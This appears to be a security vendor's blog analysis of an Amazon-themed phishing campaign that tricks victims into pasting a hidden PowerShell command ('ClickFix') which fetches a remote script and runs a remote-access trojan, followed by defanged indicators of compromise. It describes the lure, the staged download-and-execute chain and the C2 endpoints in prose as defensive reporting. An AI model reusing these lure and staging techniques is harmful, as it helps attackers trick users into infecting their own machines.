By: Dylan Main, Cofense Phishing Defense Center
Threat actors do not always need to compromise a major company to weaponize its trust; they simply need to borrow its name. In the following campaign threat, cybercriminals utilize social engineering, lookalike domains, and fake verification tactics to turn a routine security alert into a ClickFix malware delivery with the goal of convincing recipients to unknowingly infect themselves.
The Cofense Phishing Defense Center has identified an Amazon-themed malware delivery campaign that abuses the ClickFix self-infection technique to deliver a custom monitoring RAT known as HarborWatch Agent. This campaign highlights a growing trend in the threat landscape where attackers are abusing trusted brands and fake verification to turn users into the mechanism of their own infection.
.PNG?language=en "Figure1 (18)")
Figure 1: Initial Amazon-themed phishing email
This campaign begins with an Amazon-themed email with the subject “Security alert: Login activity anomaly notification.” The email impersonates Amazon’s security team and claims the recipient’s account has been locked due to “suspicious activity.” This is a common social engineering tactic used to create a sense of urgency by presenting fake account details, unknown login locations, and timestamps to pressure the user into believing that their account has been accessed without their authorization. These key factors give the email the appearance of a legitimate security notification while compelling the recipient to act quickly.
Additionally, the threat actor spoofs Amazon’s security team with a lookalike sender address “no-reply@security[.]amazonassist[.]xyz” to reinforce the brand abuse and presents a very bold “Verify Account Information” button which upon interaction kicks off the next stage of the attack.
.PNG?language=en "Figure2 (19)")
Figure 2: ClickFix Fake Security Check
After clicking the “Verify Account Information” button, the user is redirected to amazonattention[.]com, where the campaign shifts from brand impersonation to hands-on social engineering. The page itself appears to be a CAPTCHA style security check that prompts the user to follow a few steps before they can be verified as a human. However, instead of a typical CAPTCHA challenge of selecting images or completing normal browser verification, this page instructs the user to perform commands on their own system. The commands themselves instruct the user to open the Windows Run dialog with “Windows Key + R,” paste the command, which is already copied to the user's clipboard when arriving at the site, and then “Enter” to complete “verification.” While framed as a security check, this follows the same ClickFix pattern where the threat actor provides steps for verification that turn the user into the infection vehicle.
.PNG?language=en "Figure5 (8)")
Figure 3: Clipboard PowerShell Command from ClickFix Verification
The actual command copied to the user’s clipboard is hidden behind the text “I am not a robot - reCAPTCHA Verification,” giving the appearance that the pasted content is related to the fake verification. This is yet another distraction to hide a dangerous PowerShell command which continues the infection chain. The command itself launches PowerShell with -nop -w hidden which hides the normal PowerShell popup from the user. It then decodes and converts a base64 encoded string into readable text.
.PNG?language=en "Figure6 (6)")
Figure 4: Base64 Decoded Text
The decoded text as seen in Figure 4 is yet another command that continues the infection by executing a remote script which is received from amazonalert[.]xyz/download/code[.]txt. Abusing another fake Amazon domain to further the attack.
.PNG?language=en "Figure8 (5)")
Figure 5: Second-stage PowerShell Script
The downloaded remote script identified as “code.txt” contains one more PowerShell script, this time leading to the final stage of the attack. The script downloads an executable file named “mysql.exe” from hxps://zoomupdate[.]b-cdn[.]net/mysql[.]exe and stores it in the App Data\Local\Temp folder. The use of the Temp folder is common in malware deliveries as files placed there are often short lived and are easily hidden for staged downloads.
.PNG?language=en "Figure10 (2)")
Figure 6: Analysis View of Threat Chain
Once the file is downloaded it is then executed using the argument “--pass=JHSgfsa2652.” This is key because it appears that this argument is a requirement to run the file, which is a way that it may be attempting to further prevent analysis. Based on the PDC’s analysis without the --pass argument, the file will simply not run, and there is no way of analyzing the final payload. If the script is successful, it prints “Success” which may be included to complete the fake security verification to the user.
.PNG?language=en "Figure15 (1)")
Figure 7: Harbor Watch Agent Memory Analysis
Analysis of the running mysql.exe process revealed several key indicators that led the Cofense Phishing Defense Center to track this threat as HarborWatch Agent. During dynamic analysis of the sample, it was observed that the process was making several network connections to hxxp://185.193.127.44, which was determined to be the communicating command and control server used by the threat actors to issue commands and exfiltrate system information. Additionally, network analysis confirmed that this malware was using Api endpoints such as /api/agent/tasks/ and /api/heartbeat to retrieve commands and collect system information. Further memory analysis showed repeated references to HarborWatchAgent/c-1.1.1 being a clear identifier as the main agent for this campaign. This agent appears to collect sensitive system details including operating system version, architecture, hostname, CPU count, disk usage, memory usage, uptime, process count, and network status before reporting back to the Command-and-Control server.
.PNG?language=en "Figure13 (1)")
Figure 8: Chinese language Harbor Sentinel Admin Panel
Further analysis of the C2 infrastructure revealed that the 185.193.127.44 address hosted an administrator login panel when accessed via browser. Access to the panel displayed in Chinese language branded as 港湾哨兵 which upon using browser translation closely resembles “Harbor Sentinel” or “Harbor Sentry.”
.PNG?language=en "Figure14 (1)")
The translated page also prompts the administrator that after logging in, they can access asset monitoring, real-time status updates, and client details. This aligns with what was observed during analysis of the HarborWatch Agent payload which collects host assets, checks in with the C2 server, and task retrieval via /api/agent/tasks/claim. The combination of the HarborWatch Agent payload and the Harbor Sentinel suggests that the former is the main agentic payload while the latter is used for web-based monitoring by the threat actor.
Based on the available analysis and identified artifacts, the Cofense Phishing Defense Center tracks this campaign as a custom remote access trojan, named HarborWatch Agent, which is using a C2 web interface branded Harbor Sentinel as the threat actors' tool for monitoring infected systems.
Overall, this campaign highlights the continued efforts of threat actors to create and distribute new infection methods in attempts to compromise, steal, and exploit user systems for their own malicious purposes. Using a combination of brand abuse, fake verification, and ClickFix style social engineering, these threat actors are bypassing traditional attachment deliveries and instead are luring victims to infect themselves. This self-infection tactic can delay detection from security services, especially when they are disguised as routine verification.
As campaigns like this continue to evolve, organizations need solutions purpose-built to detect and stop phishing threats that evade traditional defenses. Cofense combines phishing-specific AI, trained on real-world attacks, with expert human validation to deliver accurate post-perimeter detection and response, helping strengthen organizational resilience against today's most sophisticated email threats. Request a demo today to learn more.
Email(s) IOCs:
Stage 1 - Observed Email Infection URL: | Infection URL IP(s): |
hxxps://amazonattention[.]com/verify | 172.67.190.89 |
Stage 2: Discovered Malicious File(s): | |
File Name: | File Name: Clipboard.ps1 MD5: 9abebe5a34eefb80db12bf8d51bfe7f7 SHA256: 5f7bb80bf85c1fae7413eb534cc2f022402c8753f75666525adb1dc85a677f4c File Size: 304 bytes |
File Name: | File Name: code.txt MD5: 09c121225fe254676a27c21943506714 SHA256: cf94ff2ecc4f3157704c9cfed5e446c405e7729141019045cb05ef6ffad122d5 File Size: 397 bytes |
File Name: | File Name: mysql.exe MD5: 33760b2aa86deea5805e647197c34ef5 SHA256: 3a87cab1e8c6868a7939eb422f1851ecc746405cda6b3d3502b9d8eedc360898 File Size: 203264 bytes |
Stage 2 – Observed Payload URL(s): | Payload IP(s): |
hxxps://amazonalert[.]xyz/download/code[.]txt | 172.67.189.76 |
Stage 2 – Observed Command & Control URL(s): | Command & Control IP(s): |
hXXp://185[.]193[.]127[.]44 | 185.193.127.44 |
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. Past performance is not indicative of future results.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.